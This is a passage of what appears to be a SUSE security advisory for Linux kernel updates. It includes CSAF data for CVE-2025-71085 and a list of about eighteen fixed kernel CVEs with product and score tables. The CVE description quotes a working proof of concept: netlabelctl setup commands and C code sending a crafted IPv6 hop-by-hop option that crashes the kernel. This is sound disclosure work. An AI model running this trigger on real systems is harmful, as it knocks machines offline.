"cve": "CVE-2025-71085",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71085"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr()\n\nThere exists a kernel oops caused by a BUG_ON(nhead \u003c 0) at\nnet/core/skbuff.c:2232 in pskb_expand_head().\nThis bug is triggered as part of the calipso_skbuff_setattr()\nroutine when skb_cow() is passed headroom \u003e INT_MAX\n(i.e. (int)(skb_headroom(skb) + len_delta) \u003c 0).\n\nThe root cause of the bug is due to an implicit integer cast in\n__skb_cow(). The check (headroom \u003e skb_headroom(skb)) is meant to ensure\nthat delta = headroom - skb_headroom(skb) is never negative, otherwise\nwe will trigger a BUG_ON in pskb_expand_head(). However, if\nheadroom \u003e INT_MAX and delta \u003c= -NET_SKB_PAD, the check passes, delta\nbecomes negative, and pskb_expand_head() is passed a negative value for\nnhead.\n\nFix the trigger condition in calipso_skbuff_setattr(). Avoid passing\n\"negative\" headroom sizes to skb_cow() within calipso_skbuff_setattr()\nby only using skb_cow() to grow headroom.\n\nPoC:\n\tUsing `netlabelctl` tool:\n\n netlabelctl map del default\n netlabelctl calipso add pass doi:7\n netlabelctl map add default address:0::1/128 protocol:calipso,7\n\n Then run the following PoC:\n\n int fd = socket(AF_INET6, SOCK_DGRAM, IPPROTO_UDP);\n\n // setup msghdr\n int cmsg_size = 2;\n int cmsg_len = 0x60;\n struct msghdr msg;\n struct sockaddr_in6 dest_addr;\n struct cmsghdr * cmsg = (struct cmsghdr *) calloc(1,\n sizeof(struct cmsghdr) + cmsg_len);\n msg.msg_name = \u0026dest_addr;\n msg.msg_namelen = sizeof(dest_addr);\n msg.msg_iov = NULL;\n msg.msg_iovlen = 0;\n msg.msg_control = cmsg;\n msg.msg_controllen = cmsg_len;\n msg.msg_flags = 0;\n\n // setup sockaddr\n dest_addr.sin6_family = AF_INET6;\n dest_addr.sin6_port = htons(31337);\n dest_addr.sin6_flowinfo = htonl(31337);\n dest_addr.sin6_addr = in6addr_loopback;\n dest_addr.sin6_scope_id = 31337;\n\n // setup cmsghdr\n cmsg-\u003ecmsg_len = 
cmsg_len;\n cmsg-\u003ecmsg_level = IPPROTO_IPV6;\n cmsg-\u003ecmsg_type = IPV6_HOPOPTS;\n char * hop_hdr = (char *)cmsg + sizeof(struct cmsghdr);\n hop_hdr[1] = 0x9; //set hop size - (0x9 + 1) * 8 = 80\n\n sendmsg(fd, \u0026msg, 0);",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71085",
"url": "https://www.suse.com/security/cve/CVE-2025-71085"
},
{
"category": "external",
"summary": "SUSE Bug 1256623 for CVE-2025-71085",
"url": "https://bugzilla.suse.com/1256623"
},
{
"category": "external",
"summary": "SUSE Bug 1256624 for CVE-2025-71085",
"url": "https://bugzilla.suse.com/1256624"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-27T14:04:13Z",
"details": "important"
}
],
"title": "CVE-2025-71085"
}
]
}
SUSE-SU-2026:1131-1
Vulnerability from csaf_suse - Published: 2026-03-27 16:02 - Updated: 2026-03-27 16:02
Summary
Security update for the Linux Kernel
Severity
Important
Notes
Title of the patch: Security update for the Linux Kernel
Description of the patch:
The SUSE Linux Enterprise 15 SP4 RT kernel was updated to fix various security issues.
The following security issues were fixed:
- CVE-2024-46854: net: dpaa: Pad packets to ETH_ZLEN (bsc#1231084).
- CVE-2025-21738: ata: libata-sff: Ensure that we cannot write outside the allocated buffer (bsc#1238917).
- CVE-2025-40242: gfs2: Fix unlikely race in gdlm_put_lock (bsc#1255075).
- CVE-2025-68312: usbnet: Prevents free active kevent (bsc#1255171).
- CVE-2025-71066: net/sched: ets: Always remove class from active list before deleting in ets_qdisc_change (bsc#1256645).
- CVE-2025-71085: ipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr() (bsc#1256623).
- CVE-2025-71112: net: hns3: add VLAN id validation before using (bsc#1256726).
- CVE-2026-22999: net/sched: sch_qfq: do not free existing class in qfq_change_class() (bsc#1257236).
- CVE-2026-23001: macvlan: fix possible UAF in macvlan_forward_source() (bsc#1257232).
- CVE-2026-23004: dst: fix races in rt6_uncached_list_del() and rt_del_uncached_list() (bsc#1257231).
- CVE-2026-23060: crypto: authencesn - reject too-short AAD (assoclen<8) to match ESP/ESN spec (bsc#1257735).
- CVE-2026-23074: net/sched: Enforce that teql can only be used as root qdisc (bsc#1257749).
- CVE-2026-23089: ALSA: usb-audio: Fix use-after-free in snd_usb_mixer_free() (bsc#1257790).
- CVE-2026-23191: ALSA: aloop: Fix racy access at PCM trigger (bsc#1258395).
- CVE-2026-23204: net: add skb_header_pointer_careful() helper (bsc#1258340).
- CVE-2026-23209: macvlan: fix error recovery in macvlan_common_newlink() (bsc#1258518).
- CVE-2026-23268: apparmor: fix unprivileged local user can do privileged policy management (bsc#1258850).
- CVE-2026-23269: apparmor: validate DFA start states are in bounds in unpack_pdb (bsc#1259857).
The following non-security issues were fixed:
- apparmor: fix differential encoding verification (bsc#1258849).
- apparmor: Fix double free of ns_name in aa_replace_profiles() (bsc#1258849).
- apparmor: fix memory leak in verify_header (bsc#1258849).
- apparmor: fix missing bounds check on DEFAULT table in verify_dfa() (bsc#1258849).
- apparmor: fix race between freeing data and fs accessing it (bsc#1258849).
- apparmor: fix race on rawdata dereference (bsc#1258849).
- apparmor: fix side-effect bug in match_char() macro usage (bsc#1258849).
- apparmor: fix unprivileged local user can do privileged policy management (bsc#1258849).
- apparmor: fix: limit the number of levels of policy namespaces (bsc#1258849).
- apparmor: replace recursive profile removal with iterative approach (bsc#1258849).
- apparmor: validate DFA start states are in bounds in unpack_pdb (bsc#1258849).
- net: hv_netvsc: reject RSS hash key programming without RX indirection table (bsc#1257473).
- net: tcp: allow zero-window ACK update the window (bsc#1254767).
- net: tcp: send zero-window ACK when no memory (bsc#1254767).
- scsi: storvsc: Process unsupported MODE_SENSE_10 (bsc#1257296).
- tcp: correct handling of extreme memory squeeze (bsc#1254767).
- x86/its: Fix crash during dynamic its initialization (bsc#1257771).
- x86/modules: Set VM_FLUSH_RESET_PERMS in module_alloc() (bsc#1257771).
Patchnames: SUSE-2026-1131,SUSE-SLE-Micro-5.3-2026-1131,SUSE-SLE-Micro-5.4-2026-1131
Terms of use: CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).
5.5 (Medium)
Affected products
Recommended
4 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64 | — | | Vendor Fix |
| Unresolved product id: SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch | — | | Vendor Fix |
| Unresolved product id: SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64 | — | | Vendor Fix |
| Unresolved product id: SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch | — | | Vendor Fix |
Threats
Impact
moderate
5.8 (Medium)
Affected products
Recommended
4 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64 | — | | Vendor Fix |
| Unresolved product id: SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch | — | | Vendor Fix |
| Unresolved product id: SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64 | — | | Vendor Fix |
| Unresolved product id: SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch | — | | Vendor Fix |
Threats
Impact
moderate
Affected products
Recommended
4 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64 | — | | Vendor Fix |
| Unresolved product id: SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch | — | | Vendor Fix |
| Unresolved product id: SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64 | — | | Vendor Fix |
| Unresolved product id: SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch | — | | Vendor Fix |
Threats
Impact
important
5.5 (Medium)
Affected products
Recommended
4 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64 | — | | Vendor Fix |
| Unresolved product id: SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch | — | | Vendor Fix |
| Unresolved product id: SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64 | — | | Vendor Fix |
| Unresolved product id: SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch | — | | Vendor Fix |
Threats
Impact
moderate
7.8 (High)
Affected products
Recommended
4 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64 | — | | Vendor Fix |
| Unresolved product id: SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch | — | | Vendor Fix |
| Unresolved product id: SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64 | — | | Vendor Fix |
| Unresolved product id: SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch | — | | Vendor Fix |
Threats
Impact
important
4.7 (Medium)
Affected products
Recommended
4 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64 | — | | Vendor Fix |
| Unresolved product id: SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch | — | | Vendor Fix |
| Unresolved product id: SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64 | — | | Vendor Fix |
| Unresolved product id: SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch | — | | Vendor Fix |
Threats
Impact
moderate
5.5 (Medium)
Affected products
Recommended
4 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64 | — | | Vendor Fix |
| Unresolved product id: SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch | — | | Vendor Fix |
| Unresolved product id: SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64 | — | | Vendor Fix |
| Unresolved product id: SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch | — | | Vendor Fix |
Threats
Impact
moderate
5.5 (Medium)
Affected products
Recommended
4 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64 | — | | Vendor Fix |
| Unresolved product id: SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch | — | | Vendor Fix |
| Unresolved product id: SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64 | — | | Vendor Fix |
| Unresolved product id: SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch | — | | Vendor Fix |
Threats
Impact
moderate
5.5 (Medium)
Affected products
Recommended
4 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64 | — | | Vendor Fix |
| Unresolved product id: SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch | — | | Vendor Fix |
| Unresolved product id: SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64 | — | | Vendor Fix |
| Unresolved product id: SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch | — | | Vendor Fix |
Threats
Impact
moderate
5.5 (Medium)
Affected products
Recommended
4 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64 | — | | Vendor Fix |
| Unresolved product id: SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch | — | | Vendor Fix |
| Unresolved product id: SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64 | — | | Vendor Fix |
| Unresolved product id: SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch | — | | Vendor Fix |
Threats
Impact
moderate
5.5 (Medium)
Affected products
Recommended
4 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64 | — | | Vendor Fix |
| Unresolved product id: SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch | — | | Vendor Fix |
| Unresolved product id: SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64 | — | | Vendor Fix |
| Unresolved product id: SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch | — | | Vendor Fix |
Threats
Impact
moderate
6.7 (Medium)
Affected products
Recommended
4 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch | — |
Vendor Fix
|
Threats
Impact
moderate
5.5 (Medium)
Affected products
Recommended
4 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch | — |
Vendor Fix
|
Threats
Impact
moderate
6.5 (Medium)
Affected products
Recommended
4 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch | — |
Vendor Fix
|
Threats
Impact
moderate
6.6 (Medium)
Affected products
Recommended
4 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch | — |
Vendor Fix
|
Threats
Impact
moderate
5.5 (Medium)
Affected products
Recommended
4 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch | — |
Vendor Fix
|
Threats
Impact
moderate
5.5 (Medium)
Affected products
Recommended
4 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch | — |
Vendor Fix
|
Threats
Impact
moderate
7.8 (High)
Affected products
Recommended
4 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch | — |
Vendor Fix
|
Threats
Impact
important
5.5 (Medium)
Affected products
Recommended
4 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch | — |
Vendor Fix
|
Threats
Impact
moderate
5.5 (Medium)
Affected products
Recommended
4 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch | — |
Vendor Fix
|
Threats
Impact
moderate
5.5 (Medium)
Affected products
Recommended
4 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch | — |
Vendor Fix
|
Threats
Impact
moderate
5.5 (Medium)
Affected products
Recommended
4 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch | — |
Vendor Fix
|
Threats
Impact
moderate
7.5 (High)
Affected products
Recommended
4 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch | — |
Vendor Fix
|
Threats
Impact
important
Affected products
Recommended
4 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch | — |
Vendor Fix
|
Threats
Impact
low
5.5 (Medium)
Affected products
Recommended
4 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch | — |
Vendor Fix
|
Threats
Impact
moderate
6.3 (Medium)
Affected products
Recommended
4 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch | — |
Vendor Fix
|
Threats
Impact
moderate
7.8 (High)
Affected products
Recommended
4 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch | — |
Vendor Fix
|
Threats
Impact
important
Affected products
Recommended
4 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch | — |
Vendor Fix
|
Threats
Impact
important
5.5 (Medium)
Affected products
Recommended
4 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch | — |
Vendor Fix
|
Threats
Impact
moderate
Affected products
Recommended
4 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch | — |
Vendor Fix
|
Threats
Impact
important
7.5 (High)
Affected products
Recommended
4 products
